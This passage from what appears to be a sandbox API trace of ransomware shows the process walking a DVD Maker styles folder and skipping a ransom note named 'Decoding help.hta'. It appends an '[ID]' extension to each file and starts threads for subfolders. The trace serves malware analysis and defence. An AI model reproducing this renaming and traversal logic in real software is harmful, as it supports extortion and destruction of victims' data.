Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.222] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0053.222] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.222] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.222] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.223] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0053.223] lstrlenW (lpString="NavigationLeft_ButtonGraphic.png") returned 32 [0053.223] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.223] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.223] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.223] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="NavigationLeft_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" [0053.223] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" [0053.223] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.223] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0053.224] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.224] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.224] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.224] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0053.224] lstrlenW (lpString="NavigationLeft_SelectionSubpicture.png") returned 38 [0053.224] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.224] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.224] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.224] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="NavigationLeft_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" [0053.224] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" [0053.224] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.225] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef38095, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef38095, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0053.225] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.225] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.225] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.225] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.225] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0053.225] lstrlenW (lpString="NavigationRight_ButtonGraphic.png") returned 33 [0053.225] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.225] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.225] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.225] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="NavigationRight_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" [0053.225] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" [0053.225] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.225] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.226] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef5e1f2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef5e1f2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0053.226] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.226] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.226] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.226] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0053.226] lstrlenW (lpString="NavigationRight_SelectionSubpicture.png") returned 39 [0053.226] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.226] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.226] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.226] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="NavigationRight_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" [0053.226] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" [0053.226] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.227] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0053.227] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.227] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.227] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.227] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0053.227] lstrlenW (lpString="NavigationUp_ButtonGraphic.png") returned 30 [0053.227] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.228] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.228] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.228] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="NavigationUp_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" [0053.228] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" [0053.228] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.228] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0053.228] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.228] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.228] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.229] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.229] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0053.229] lstrlenW (lpString="NavigationUp_SelectionSubpicture.png") returned 36 [0053.229] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.229] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.229] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.229] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="NavigationUp_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" [0053.229] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" [0053.229] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.230] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OldAge", cAlternateFileName="")) returned 1 [0053.230] lstrcmpW (lpString1=".", lpString2="OldAge") returned -1 [0053.230] lstrcmpW (lpString1="..", lpString2="OldAge") returned -1 [0053.230] lstrcmpiW (lpString1="windows", lpString2="OldAge") returned 1 [0053.230] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.230] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.230] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="OldAge" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" [0053.230] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*.*" [0053.230] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0053.230] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ee8140, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e0 [0053.231] CloseHandle (hObject=0x3e0) returned 1 [0053.231] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Performance", cAlternateFileName="PERFOR~1")) returned 1 [0053.231] 